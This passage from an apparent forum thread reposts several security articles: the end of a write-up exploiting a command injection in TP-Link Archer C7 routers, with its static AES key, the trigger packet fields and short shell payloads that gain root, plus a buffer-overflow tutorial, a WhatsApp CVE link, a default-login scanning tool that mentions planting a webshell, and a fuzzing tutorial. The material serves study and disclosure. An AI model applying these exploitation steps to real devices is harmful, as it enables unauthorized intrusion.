packet) is equal to 1. Next, it calculates a checksum of the packet using a custom checksum function: tpdp_pkt_calc_checksum() (0x4037f0). To better understand what is happening, the following function is calc_checksum(), which is part of the lao_bomb exploit code. This is shown in place of tpdp_pkt_calc_checksum() as it is easier to understand. Figure 3 - calc_checksum() from the lao_bomb exploit code The checksum calculation is quite straightforward. It starts by setting a magic variable of 0x5a6b7c8d in the packet’s checksum field, and then uses reference_tbl, a table with 1024 bytes, to calculate the checksum over the whole packet, including the header. Once the checksum is verified and all is correct, tdpd_pkt_sanity_checks() returns 0, and we then enter the next part of tdpd_pkt_parser(): Figure 4 - tdpd_pkt_parser() #2 Here the second byte of the packet, the type field, is checked to see if it is 0 (tdpd) or 0xf0 (onemesh). In the latter branch, it also checks if the global variable onemesh_flag is set to 1, which it is by default. This is the branch we want to follow. We then enter onemesh_main() (0x40cd78). onemesh_main() won’t be shown here for brevity, but its job is to invoke another function based on the packet’s opcode field. In order to reach our vulnerable function, the opcode field has to be set to 6, and the flags field has to be set to 1. In this case, onemesh_slave_key_offer() (0x414d14) will be invoked. This is our vulnerable function, and as it is very long, only the relevant parts will be shown. Figure 5 - onemesh_slave_key_offer() #1 In this first snippet of onemesh_slave_key_offer(), we see that it passes the packet payload to tpapp_aes_decrypt() (0x40b190). This function will also not be shown for brevity, but it’s easy to understand what it does from the name and its arguments: it decrypts the packet payload using the AES algorithm and the static key “TPONEMESH_Kf!xn?gj6pMAt-wBNV_TDP”. This encryption was complicated to replicate in the lao_bomb exploit. We will explain this in detail in the next section. For now, we will assume that tpapp_aes_decrypt was able to decrypt the packet successfully, so we move on to the next relevant snippet in onemesh_slave_key_offer(): Figure 6- onemesh_slave_key_offer() #2 In this snippet, we see some other functions being called (basically the setup of the onemesh object) followed by the start of the parsing of the actual packet payload. The expected payload is a JSON object, such as the one shown below: Figure 7 - Example JSON payload for onemesh_slave_key_offer() In Figure 6, we can see the code first fetching the method JSON key and its value, and then the start of the parsed data JSON object. The next snippet shows that each key of the data object is processed in order. If one of the required keys does not exist, the function simply exits: Figure 8 - onemesh_slave_key_offer() #3 As it can be seen above, the value of each JSON key is parsed and then copied into a stack variable (slaveMac, slaveIp, etc). After parsing the JSON object, the function starts preparing the response by invoking create_csjon_obj() (0x405fe8). From here onwards, the function performs a variety of operations on the received data. The part that matters is shown below: Figure 9 - onemesh_slave_key_offer() #4 And here is our vulnerability in its full glory. Referring back to Figure 8 above, you can see that the value of the JSON key slave_mac was copied into the slaveMac stack variable. In Figure 9, slaveMac is copied by sprintf into the systemCmd variable that is then passed to system(). Exploitation Reaching the Vulnerable Function The first thing to determine is how to reach this command injection. After trial and error, we found out that sending the JSON structure shown in Figure 7 above always hits the vulnerable code path. In particular, method has to be slave_key_offer, and want_to_join has to be false. The other values can be chosen arbitrarily, although some special characters in fields other than slave_mac might cause the vulnerable function to exit early and not process our injection. With regards to the packet header, as previously described, we have to set type to 0xf0, opcode to 6 and flags to 1, as well as get the checksum field correct. Encrypting the Packet As explained in the previous section, the packet is encrypted with AES with a fixed key of TPONEMESH_Kf!xn?gj6pMAt-wBNV_TDP. There are a few more missing pieces to this puzzle, though. The cipher is used in CBC mode and the IV is the fixed value 1234567890abcdef1234567890abcdef. Furthermore, despite having a 256-bit key and IV, the actual algorithm used is AES-CBC with a 128-bit key, so half of the key and IV are not used. Achieving Code Execution Now we know how to hit the vulnerable code path, can we just send a packet with a command and get code execution? There are two problems to overcome: i. The strncpy() only copies 0x11 bytes from the slave_mac_info key into the slaveMac variable, and that includes the terminating null byte. ii. We need to perform some escaping, since the value in slaveMac will be enclosed in both single and double quotes. With these two constraints in mind, the actual available space is quite limited. In order to escape the arguments and execute a payload, we have to add the following characters: ';<PAYLOAD>' We have just lost 3 characters, leaving us with only 13 bytes to construct our payload. With 13 bytes (characters), it’s pretty much impossible to execute anything meaningful. In addition, we found through testing that the limit is actually 12 bytes. We did not fully understand why, but it appears it has to do with the escaping. Our solution was to trigger the bug many times, building up a desired command file on the target one character at a time. Then we trigger the bug one final time to execute the command file as a shell script. Even so, this technique is a lot more difficult than it looks at a first glance. Consider, for example, that to append a character ‘a’ to a file named ‘z’, we can simply do this: printf a>>z Notice how even this simple case requires 11 bytes. If we want to write a digit, the technique shown above does not work. This is because a digit is interpreted by the shell as a file descriptor. Similarly, special characters such as ‘.’ or ‘;’ that are interpreted by the shell cannot be written to a file using the method above. To handle these cases, we need to do the following: printf '1'>x If you notice, this actually does not append a character to an existing file but instead creates a new file named ‘x’ (overwriting any existing file by that name) containing just the character ‘1’. Since this payload is already 12 characters long, there is no way to add an extra ‘>’ that would allow us to append the 1 to the command file we are building. Nevertheless, there is a solution. Every time we need to emit a digit or special character, we first write the character to a new file, and afterwards use cat to append the contents of this new file to the command file being built: cat x*>>z* You might wonder why we need the ‘*’ at the end of each file name. That’s because despite the fact that we always escape the command we send, the last few bytes of the lua script that was supposed to be executed end up in the file name. This means that when we try to create a file named ‘z’, in reality it will be named ‘z”})’. Adding the full filename into our command would consume too many bytes. Luckily for us, the shell does autocompletion with the special ‘*’ character. Astute readers will notice that we did not change to /tmp, as it is many times necessary in embedded devices, as the filesystem root is usually not writeable. Again, we were lucky. The root filesystem is mounted read-write, which is a major security mistake by TP-Link. Had it been mounted read-only, as is normal in most embedded devices that use the SquashFS filesystem, this particular attack would have been impossible, as adding cd tmp would consume too many of the available 12 characters. And with this, we have all the tools we need to execute arbitrary commands. We send the command byte by byte, adding them to a command file ‘z’, and then we send the payload: sh z and our command file gets executed as root. From here on, we can download and execute a binary, and we have full control of the router. Users of TP-Link routers with support questions can email support.email@tp-link.com. Thanks again to Pedro and Radek for providing this great write-up. This duo has competed in multiple Pwn2Own competitions, including winning $75,000 at this year’s Pwn2Own Miami event. We certainly hope to see more from them in future competitions. Until then, follow the team for the latest in exploit techniques and security patches. Sursa: https://www.zerodayinitiative.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo
  18. Interactive guide to Buffer Overflow exploitation December 16, 2019 Written by: Vetle Økland Back to blog A Buffer Overflow is a bug class in a program typically written in a memory unsafe language like C or C++. Buffer Overflow bugs from user-input can often allow someone to overwrite some data in memory they weren't supposed to. Before we dive into how to exploit Buffer Overflow bugs, we will do a quick introduction to Assembly. Assembly is a language that describes raw machine code. Assembly is the lowest level programming language, and the processor executes exactly what you write in Assembly. This means that we can also directly translate machine code bits and bytes back to Assembly without losing any information. Languages like C, C++, Rust, etc. on the other hand translate what you write to machine code, which we can translate back to Assembly, but we can't translate it back to exactly what the code was in C, C++ or Rust, only approximations based on the Assembly. For all intents and purposes, Assembly is the exact code that the processor executes. Let's jump into a little interactive primer on Assembly. First of all, in Assembly we don't really have variables in the sense that we have in JavaScript, C, Rust, Go, etc. Instead, we have a set amount of registers that can store one value at a time. On a 64-bit system, these registers can store up to 64 bits of values (e.g. number from 0 to 18 446 744 073 709 551 615), on a 32-bit system registers can store up to 32-bit of values (0 to 4 294 967 295). Some of the registers in Intel architectures are named RAX, RDI, RBX, these are general purpose registers that you can pretty much use for whatever you want. Then there are others like RIP and RSP which control the address of the next instruction we should execute is in memory and address to the stack (more on that later), respectively. Underneath you will see what happens when we execute mov {register}, {value} instructions. mov is a "command" that tells the processor to store (or "move") values into a register or memory address. When you step through the program you can see that for each mov instruction the register updates with the value specified in the mov instruction. Most values in these examples are represented as HEX values. main: 0xFA2 mov eax, 0x1337 0xFA7 mov ebx, 0x7331 0xFAC mov edi, 0x1995 0xFB1 call exit RAX0x00000000RBX0x00000000RDI0x00000000 Note that eax and rax are two different names for the same register. You can read about that here if you're interested in learning more about it. Most processor architectures have a concept of a "stack". The stack is a quick place to store temporary values in memory (RAM). 64-bit systems store 64 bits (8 bytes) at a time in a growing stack, and when you go to fetch the values you fetch them 64 bits at a time, or 8 bytes. You store a value on the stack by using instruction push {register name} and you fetch a value into a register by using instruction pop {register name}. There is a special register RSP that has the value (pointer) of the memory address of the last value on the stack. This means RSP should always point to the last value you pushed to the stack. If you pop (fetch) a value from the stack, RSP decreases by 8, because we always push (store) and pop (fetch) values in 8-byte increments or decrements. main: 0xFA9 mov eax, 0x13371337 0xFAE push rax 0xFAF pop rdi 0xFB0 call exit RAX0x00000000RDI0x00000000RSP0x00005000 Here we set RAX to the HEX value 0x13371337, we push that value to the stack and then pop it into RDI On the right side underneath the registers you can see the stack, each box is 1 byte, each row is 1 8-byte value. On the top of each box you can see the memory address of the byte, on the bottom is the byte's value and in the middle you can see the ASCII representation of the value. Here's how it looks if you push and pop multiple values. main: 0xFA5 mov eax, 0x13371337 0xFAA push rax 0xFAB push rax 0xFAC push rax 0xFAD pop rdi 0xFAE pop rbx 0xFAF pop rsi 0xFB0 call exit RAX0x00000000RDI0x00000000RBX0x00000000RSI0x00000000RSP0x00005000 There's another special register called RIP that always points to the memory address of the next instruction the processor is going to execute. This register cannot be changed with mov instructions, but we can use jmp instructions instead. This allows us to jump to different places in the program when we need to. add1: 0xFA5 add rax, 1 0xFA9 jmp add2 main: 0xFAB mov eax, 1 0xFB0 jmp add1 add2: 0xFB2 add rax, 2 0xFB6 jmp add1 RAX0x00000000RIP0x00000fab When we jump to "add2" we add 2 to the current value of RAX, when we jump to add1 we add 1. The emulator has conveniently labeled addresses for us, so instead of seeing jmp 0xFA5, it's changed to the more readable jmp add1. The labels in the assembly view are for convenience, but when the processor executes the code, it doesn't care nor need the labels. This means that the label add1 is for address 0xFA5, main is for address 0xFAB and add2 is for address 0xFB2. Another way to jump to another place in the code is to use a call {address} instruction. A call instruction basically pushes the address of the next instruction after the call instruction to stack then jumps to the specified address. The counterpart to call is ret which pops the last value on the stack and jumps (returns) to that address. This lets pieces of code act as functions that you can call and then return from when it's done and continue normal execution. Functions we often want to call is to print something on screen, transform text, etc., just like you use functions in other programming languages. main: 0xF9D mov eax, 0x666 _loop: 0xFA2 call sub1 0xFA7 call add2 0xFAC jmp _loop add2: 0xFAE add rax, 2 0xFB2 ret sub1: 0xFB3 sub rax, 1 0xFB7 ret RAX0x00000000RIP0x00000f9dRSP0x00005000 Calls can also be nested, and you should see the stack grow and shrink as calls and returns are being executed. main: 0xF93 call call1 0xF98 call exit call1: 0xF9D call call2 0xFA2 ret call2: 0xFA3 call call3 0xFA8 ret call3: 0xFA9 call call4 0xFAE ret call4: 0xFAF mov eax, 0x42 0xFB4 ret RAX0x00000000RIP0x00000f93RSP0x00005000 We can also call functions with arguments, but we cannot do that inline in a call instruction, we need to either use the stack or the registers. For functions with few parameters we use registers for the first argument, the second, and the third. If we want to print something, we can use the printf function with the memory address of the string we want to print in the RDI register. To load the memory address into RDI we need to use the lea instruction, for our intents and purposes you can think of lea as a fancy mov. When we run the lea instruction in the emulator you can see that RDI is updated to 0x1000 which is the address of the "Hello, world!" string. main: 0xFA2 lea rdi, qword ptr [hello_world] 0xFA9 call printf 0xFAE call exit RDI0x00000000 Which registers to use for function arguments, and how many before the stack is used instead, varies a lot depending on programming language, compiler, operating system, etc. Assembly does not specify which registers must be used for arguments. Some functions also return some value, this is often in the RAX register. After we've called a function we can get the return value from the RAX register. Underneath is a little program that parrots what you input. First it prints the string "Say something: " to the screen, then it allocates 8 bytes on the stack for your input by subtracting 8 from the value of RSP. The read function takes two arguments, the first (in RDI) is the address of where to put the user's message, the second (in RSI) is the maximum number of bytes from user input to read. main: 0xF7C lea rdi, qword ptr [say_something] 0xF83 call print 0xF88 sub rsp, 8 0xF8C mov rdi, rsp 0xF8F mov esi, 8 0xF94 call read 0xF99 mov rax, rsp 0xF9C lea rdi, qword ptr [you_said] 0xFA3 call printf 0xFA8 call exit RDI0x00000000RSP0x00005000 When you reach the read instruction, all further execution is blocked until you press enter in the console. When running the example, you should be able to see your input (up to 8 bytes) in the stack visualization, each character represented in their own "boxes". printf in this case takes the first format argument in RAX, so we copy the value of RSP over to RAX because the user input string is currently the last thing on the stack, and we want printf to print that string. A bug arises when user input is allowed to exceed the number of bytes we reserved for it. In the case of the last example, if RSI had been a larger number than what we subtracted from RSP before calling read, the user could have written over some previous values on the stack. In the get_name function of the example below we are allocating 0x10 (16) bytes from RSP (with sub rsp, 0x10), but when calling read we are instructing it in the RSI register to accept up to 0x18 (24) bytes into the memory location of RDI (which points at the stack). The value put on the stack before the 16 bytes allocated for user input is a return address from the call made to get_name in main. secret_function: 0xF52 lea rdi, qword ptr [secret_text] 0xF59 call print 0xF5E call exit main: 0xF63 call ask_name 0xF68 call get_name 0xF6D mov rax, rdi 0xF70 call welcome 0xF75 call exit ask_name: 0xF7A lea rdi, qword ptr [wassa_you_name] 0xF81 call print 0xF86 ret get_name: 0xF87 sub rsp, 0x10 0xF8B mov rdi, rsp 0xF8E mov esi, 0x18 0xF93 call read 0xF98 mov rdi, rsp 0xF9B add rsp, 0x10 0xF9F ret welcome: 0xFA0 lea rdi, qword ptr [welcome_msg] 0xFA7 call printf 0xFAC ret RDI0x00000000RSP0x00005000 In this example there is a function called secret_function that is not called anywhere in normal execution. However, because of the buffer overflow it is possible to "return" to that function by first writing 16 bytes of whatever you want followed by 8 bytes that represent the address you want to return to. For example, if I wanted to go directly to call exit at address 0xF75, I would input AAAAAAAAAAAAAAAA\x00\x00\x00\x00\x00\x00\x0f\x75 into the console when prompted for input. By prepending \x to a hexadecimal, you input that byte directly, so \0x41 is the ASCII representation for A, \x00 is just a null byte. The secret_function starts at address 0xf52, you should be able to edit my example input to jump to that function. The last example is more complex than the previous examples. This program generates a random password each time it starts and requires you to input the right one to "log in". You'll find that in the enter_password function read is being given more space than was allocated on the stack. Try to bypass the login function and get to say_success. main: 0xE80 call boot_up 0xE85 call exit say_success: 0xE8A lea rdi, qword ptr [_loggedin_msg] 0xE91 call print 0xE96 call exit say_wrong: 0xE9B lea rdi, qword ptr [wrong_pass_msg] 0xEA2 call print 0xEA7 ret enter_password: 0xEA8 lea rdi, qword ptr [enter_pass_msg] 0xEAF call print 0xEB4 sub rsp, 0x10 0xEB8 mov rdi, rsp 0xEBB mov esi, 0x20 0xEC0 call read 0xEC5 lea rsi, qword ptr [password_ptr] 0xECC mov rsi, qword ptr [rsi] 0xECF mov edx, 0x10 0xED4 call strncmp 0xED9 add rsp, 0x10 0xEDD ret boot_up: 0xEDE lea rdi, qword ptr [booting_msg] 0xEE5 call print 0xEEA call integrity_check 0xEEF lea rdi, qword ptr [welcome_msg] 0xEF6 call print password_loop: 0xEFB call enter_password 0xF00 cmp rax, 0 0xF04 je say_success 0xF06 call say_wrong 0xF0B jmp password_loop 0xF0D ret integrity_check: 0xF0E push rdi 0xF0F lea rdi, qword ptr [password_ptr] 0xF16 mov edi, 0x10 0xF1B call malloc 0xF20 mov rdi, rax 0xF23 call create_random_password 0xF28 lea rax, qword ptr [password_ptr] 0xF2F mov qword ptr [rax], rdi 0xF32 pop rdi 0xF33 ret RAX0x00000000RBX0x00000000RDI0x00000000 Some of the concepts in this blog post are grossly oversimplified, and we are not talking about any mitigations to these types of attacks at all. These types of attacks have worked well in the past, but due to mitigations such as ASLR, DEP, Stack Canaries, and more recently Pointer Authentication, modern binary exploitation requires a lot more effort from the attacker. I have not touched endianness because I only see it as adding unnecessary complexity that isn't really relevant to the exercises. In fact, the emulator actually handles endianness wrong, according to the Intel specifications. Normally, in a situation where you can control the instruction pointer and DEP is not present (e.g. you can execute code on the stack or other writable memory) you would just write your own custom code there and jump to it. That gives you a lot of freedom in terms of how to attack, but with DEP enabled you instead have to create a ROP chain. We have another interactive tutorial on ROP that you might want to look at. I'd love some feedback over on Twitter @bordplate. Or you can check out the code for the emulator on GitHub. Sursa + Interactiv: https://nagarrosecurity.com/blog/interactive-buffer-overflow-exploitation
  19. This was originally published on PerimeterX company's official Github through my work Github account. Eventhough this is my work - all rights and legal concerns belong to PerimeterX company. WhatsApp Vulnerabilities Disclosure - Open Redirect + CSP Bypass + Persistent XSS + FS read permissions + potential for RCE CVE-2019-18426 Exploit DB Technical Article Original Vulnerabilities Disclosures Documents DEMO Vids! Sursa: https://github.com/weizman/CVE-2019-18426
  20. Hunter of Default Logins (Web/HTTP) 2020-04-07 We all like them, don’t we? Those easy default credentials. Surely we do, but looking for them during penetration tests is not always fun. It’s actually hard work! Especially when we have a large environment. How can we check all those different web interfaces? Is there a viable automation? In this article we will present our HTTP default login hunter. Table Of Contents hide Introduction NNdefaccts alternate dataset Nmap script limitations Introducing default-http-login-hunter Additional features Fingerprint contribution Conclusion Thanks Introduction Checking administrative interfaces for weak and default credentials is a vital part of every VAPT exercise. But doing it manually can quickly become exhausting. The problem with web interfaces is that they are all different. And so to develop an universal automation that could do the job across multiple interfaces is very hard. Although there are some solutions for this, they are mostly commercial and the functionality is not even that great. Luckily there is a free and open source solution that can help us. NNdefaccts alternate dataset The NNdefaccts dataset made by nnposter is an alternate fingerprint dataset for the Nmap http-default-accounts.nse script. The NNdefacts dataset can test more than 380 different web interfaces for default logins. For comparison, the latest Nmap 7.80 default dataset only supports 55. Here are some examples of the supported web interfaces: Network devices (3Com, Asus, Cisco, D-Link, F5, Nortel..) Video cameras (AXIS, GeoVision, Hikvision, Sanyo..) Application servers (Apache Tomcat, JBoss EAP..) Monitoring software (Cacti, Nagios, OpenNMS..) Server management (Dell iDRAC, HP iLO..) Web servers (WebLogic, WebSphere..) Printers (Kyocera, Sharp, Xerox..) IP Phones (Cisco, Polycom..) Citrix, NAS4Free, ManageEngine, VMware.. See the following link for a full list: https://github.com/InfosecMatter/http-default-logins/blob/master/list.txt The usage is quite simple – we simply run the Nmap script with the alternate dataset as a parameter. Like this: nmap --script http-default-accounts --script-args http-default-accounts.fingerprintfile=~/http-default-accounts-fingerprints-nndefaccts.lua -p 80 192.168.1.1 This is already pretty great as it is. Nmap script limitations Now the only caveat with this solution is that the http-default-accounts.nse script works only for web servers running on common web ports such as tcp/80, tcp/443 or similar. This is because the script contains the following port rule which matches only common web ports: So what if we find a web server running on a different port – say tcp/9999? Unfortunately the Nmap script will not run because of the port rule.. ..unless we modify the port rule in the Nmap script to match our web server port! And that’s exactly where our new tool comes handy. Introducing default-http-login-hunter The default-http-login-hunter tool, written in Bash, is essentially a wrapper around the aforementioned technologies to unlock their full potential and to make things easy for us. The tool simply takes a URL as an argument: default-http-login-hunter.sh <URL> First it will make a local temporary copy of the http-default-accounts.nse script and it will modify the port rule so that it will match the web server port that we provided in the URL. Then it will run the Nmap command for us and display the output nicely. Here’s an example: From the above screenshot we can see that we found a default credentials for Apache Tomcat running on port tcp/9999. Now we could deploy a webshell on it and obtain RCE. But that’s another story. Additional features List of URLs The tool also accepts a list of URLs as an input. So for instance, we could feed it with URLs that we extracted from Nessus scan results using our Nessus CSV parser. The tool will go through all the URLs one by one and check for default logins. Like this: default-http-login-hunter.sh urls.txt Here the tool found a default login to the Cisco IronPort running on port https/9443. Resume-friendly Another useful feature is that it saves all the results in the current working directory. So if it gets accidentally interrupted, it will just continue where it stopped. Like in this example: Here we found some Polycom IP phones logins. Staying up-to-date To make sure that we have the latest NNdefacts dataset, run the update command: default-http-login-hunter.sh update And that’s pretty much it. If you want to see more detailed output, use -v parameter in the command line. You can find the tool in our InfosecMatter Github repository here. Fingerprint contribution I encourage everyone to check out the NNdefacts project and consider contributing with fingerprints that you found during your engagements. Contribution is not hard – you can simply record the login procedure in the Fiddler, Burp or ZAP and send the session file to the author. Please see more information on the fingerprint contribution here. You may find these links useful while hunting for default logins manually: https://cirt.net/passwords https://www.routerpasswords.com/ Conclusion This tool can be of a great help not only while performing internal infrastructure penetration tests, but everywhere where we need to test a web interface for default credentials. Its simple design and smart features make it also very easy to use. Hope you will find it useful too! Thanks Lastly, I want to thank nnposter for his awesome NNdefacts dataset without which this would not be possible and also for his contributions to the Nmap project. Thank you nnposter! Sursa: https://www.infosecmatter.com/hunter-of-default-logins-web-http/
      • 1
      • Upvote
  21. Fuzzing Like A Caveman 28 minute read Introduction I’ve been passively consuming a lot of fuzzing-related material in the last few months as I’ve primarily tried to up my Windows exploitation game from Noob-Level to 1%-Less-Noob-Level, and I’ve found it utterly fascinating. In this post I will show you how to create a really simple mutation fuzzer and hopefully we can find some crashes in some open source projects with it. The fuzzer we’ll be creating is from just following along with @gynvael’s fuzzing tutorial on YouTube. I had no idea that Gynvael had streams so now I have dozens more hours of content to add to the never ending list of things to watch/read. I must also mention that Brandon Faulk’s fuzzing streams are incredible. I don’t understand roughly 99% of the things Brandon says, but these streams are captivating. My personal favorites so far have been his fuzzing of calc.exe and c-tags. He also has this wonderful introduction to fuzzing concepts video here: NYU Fuzzing Talk. Picking a Target I wanted to find a binary that was written in C or C++ and parsed data from a file. One of the first things I came across was binaries that parse Exif data out of images. We also want to pick a target with virtually no security implications since I’m publishing these findings in real time. From https://www.media.mit.edu/pia/Research/deepview/exif.html, Basically, Exif file format is the same as JPEG file format. Exif inserts some of image/digicam information data and thumbnail image to JPEG in conformity to JPEG specification. Therefore you can view Exif format image files by JPEG compliant Internet browser/Picture viewer/Photo retouch software etc. as a usual JPEG image files. So Exif inserts metadata type information into images in conformity with the JPEG spec, and there exists no shortage of programs/utilities which helpfully parse this data out. Getting Started We’ll be using Python3 to build a rudimentary mutation fuzzer that subtly (or not so subtly) alters valid Exif-filled JPEGs and feeds them to a parser hoping for a crash. We’ll also be working on an x86 Kali Linux distro. First thing’s first, we need a valid Exif-filled JPEG. A Google search for ‘Sample JPEG with Exif’ helpfully leads us to this repo. I’ll be using the Canon_40D.jpg image for testing. Getting to Know the JPEG and EXIF Spec Before we start just scribbling Python into Sublime Text, let’s first take some time to learn about the JPEG and Exif specification so that we can avoid some of the more obvious pitfalls of corrupting the image to the point that the parser doesn’t attempt to parse it and wastes precious fuzzing cycles. One thing to know from the previously referenced specification overview, is that all JPEG images start with byte values 0xFFD8 and end with byte values 0xFFD9. This first couple of bytes are what are known as ‘magic bytes’. This allows for straightforward file-type identification on *Nix systems. root@kali:~# file Canon_40D.jpg Canon_40D.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, components 3 We can take the .jpg off and get the same output. root@kali:~# file Canon Canon: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, components 3 If we hexdump the image, we can see the first and last bytes are in fact 0xFFD8 and 0xFFD9. root@kali:~# hexdump Canon 0000000 d8ff e0ff 1000 464a 4649 0100 0101 4800 ------SNIP------ 0001f10 5aed 5158 d9ff Another interesting piece of information in the specification overview is that ‘markers’ begin with 0xFF. There are several known static markers such as: the ‘Start of Image’ (SOI) marker: 0xFFD8 APP1 marker: 0xFFE1 generic markers: 0xFFXX the ‘End of Image’ (EOI) marker: 0xFFD9 Since we don’t want to change the image length or the file type, let’s go ahead and plan to keep the SOI and EOI markers intact when possible. We don’t want to insert 0xFFD9 into the middle of the image for example as that would truncate the image or cause the parser to misbehave in a non-crashy way. ‘Non-crashy’ is a real word. Also, this could be misguided and maybe we should be randomly putting EOI markers in the byte stream? Let’s see. Starting Our Fuzzer The first thing we’ll need to do is extract all of the bytes from the JPEG we want to use as our ‘valid’ input sample that we’ll of course mutate. Our code will start off like this: #!/usr/bin/env python3 import sys # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] data = get_bytes(filename) If we want to see how this data looks, we can print the first 10 or so byte values in the array and see how we’ll be interacting with them. We’ll just temporarily add something like: else: filename = sys.argv[1] data = get_bytes(filename) counter = 0 for x in data: if counter < 10: print(x) counter += 1 Running this shows that we’re dealing with neatly converted decimal integers which makes everything much easier in my opinion. root@kali:~# python3 fuzzer.py Canon_40D.jpg 255 216 255 224 0 16 74 70 73 70 Let’s just quickly see if we can create a new valid JPEG from our byte array. We’ll add this function to our code and run it. def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() So now we have mutated.jpg in our directory, let’s hash the two files and see if they match. root@kali:~# shasum Canon_40D.jpg mutated.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e Canon_40D.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e mutated.jpg Awesome, we have two identical files. Now we can get into the business of mutating the data before creating our mutated.jpg. Mutating We’ll keep our fuzzer relatively simple and only implement two different mutation methods. These methods will be: bit flipping overwriting byte sequences with Gynvael’s ‘Magic Numbers’ Let’s start with bit flipping. 255 (or 0xFF) in binary would be 11111111 if we were to randomly flip a bit in this number, let say at index number 2, we’d end up with 11011111. This new number would be 223 or 0xDF. I’m not entirely sure how different this mutation method is from randomly selecting a value from 0 - 255 and overwritng a random byte with it. My intuiton says that bit flipping is extremely similar to randomly overwriting bytes with an arbitrary byte. Let’s go ahead and say we want to only flip a bit in 1% of the bytes we have. We can get to this number in Python by doing: num_of_flips = int((len(data) - 4) * .01) We want to subtract 4 from the length of our bytearray because we don’t want to count the first 2 bytes or the last 2 bytes in our array as those were the SOI and EOI markers and we are aiming to keep those intact. Next we’ll want to randomly select that many indexes and target those indexes for bit flipping. We’ll go ahead and create a range of possible indexes we can change and then choose num_of_flips of them to randomly bit flip. indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 Let’s add import random to our script, and also add these debug print statements to make sure everything is working correctly. print("Number of indexes chosen: " + str(len(chosen_indexes))) print("Indexes chosen: " + str(chosen_indexes)) Our function right now looks like this: def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 print("Number of indexes chosen: " + str(len(chosen_indexes))) print("Indexes chosen: " + str(chosen_indexes)) If we run this, we get a nice output as expected: root@kali:~# python3 fuzzer.py Canon_40D.jpg Number of indexes chosen: 79 Indexes chosen: [6580, 930, 6849, 6007, 5020, 33, 474, 4051, 7722, 5393, 3540, 54, 5290, 2106, 2544, 1786, 5969, 5211, 2256, 510, 7147, 3370, 625, 5845, 2082, 2451, 7500, 3672, 2736, 2462, 5395, 7942, 2392, 1201, 3274, 7629, 5119, 1977, 2986, 7590, 1633, 4598, 1834, 445, 481, 7823, 7708, 6840, 1596, 5212, 4277, 3894, 2860, 2912, 6755, 3557, 3535, 3745, 1780, 252, 6128, 7187, 500, 1051, 4372, 5138, 3305, 872, 6258, 2136, 3486, 5600, 651, 1624, 4368, 7076, 1802, 2335, 3553] Next we need to actually mutate the bytes at those indexes. We need to bit flip them. I chose to do this in a really hacky way, feel free to implement your own solution. We’re going to covert the bytes at these indexes to binary strings and pad them so that they are 8 digits long. Let’s add this code and see what I’m talking about. We’ll be converting the byte value (which is in decimal remember) to a binary string and then padding it with leading zeroes if it’s less than 8 digits long. The last line is a temporary print statement for debugging. for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current As you can see, we have a nice output of binary numbers as strings. root@kali:~# python3 fuzzer.py Canon_40D.jpg 10100110 10111110 10010010 00110000 01110001 00110101 00110010 -----SNIP----- Now for each of these, we’ll randomly select an index, and flip it. Take the first one, 10100110, if select index 0, we have a 1, we’ll flip it to 0. Last considering for this code segment is that these are strings not integers remember. So the last thing we need to do is convert the flipped binary string to integer. We’ll create an empty list, add each digit to the list, flip the digit we randomly picked, and the construct a new string from all the list members. (We have to use this intermediate list step since strings are mutable). Finally, we convert it to an integer and return the data to our create_new() function to create a new JPEG. Our script now looks like this in total: #!/usr/bin/env python3 import sys import random # read bytes from our valid JPEG and return them in a mutable bytearray def get_bytes(filename): f = open(filename, "rb").read() return bytearray(f) def bit_flip(data): num_of_flips = int((len(data) - 4) * .01) indexes = range(4, (len(data) - 4)) chosen_indexes = [] # iterate selecting indexes until we've hit our num_of_flips number counter = 0 while counter < num_of_flips: chosen_indexes.append(random.choice(indexes)) counter += 1 for x in chosen_indexes: current = data[x] current = (bin(current).replace("0b","")) current = "0" * (8 - len(current)) + current indexes = range(0,8) picked_index = random.choice(indexes) new_number = [] # our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0'] for i in current: new_number.append(i) # if the number at our randomly selected index is a 1, make it a 0, and vice versa if new_number[picked_index] == "1": new_number[picked_index] = "0" else: new_number[picked_index] = "1" # create our new binary string of our bit-flipped number current = '' for i in new_number: current += i # convert that string to an integer current = int(current,2) # change the number in our byte array to our new number we just constructed data[x] = current return data # create new jpg with mutated data def create_new(data): f = open("mutated.jpg", "wb+") f.write(data) f.close() if len(sys.argv) < 2: print("Usage: JPEGfuzz.py <valid_jpg>") else: filename = sys.argv[1] data = get_bytes(filename) mutated_data = bit_flip(data) create_new(mutated_data) Analyzing Mutation If we run our script, we can shasum the output and compare to the original JPEG. root@kali:~# shasum Canon_40D.jpg mutated.jpg c3d98686223ad69ea29c811aaab35d343ff1ae9e Canon_40D.jpg a7b619028af3d8e5ac106a697b06efcde0649249 mutated.jpg This looks promising as they have different hashes now. We can further analyze by comparing them with a program called Beyond Compare or bcompare. We’ll get two hexdumps with differences highlighted. As you can see, in just this one screen share we have 3 different bytes that have had their bits flipped. The original is on the left, the mutated sample is on the right. This mutation method appears to have worked. Let’s move 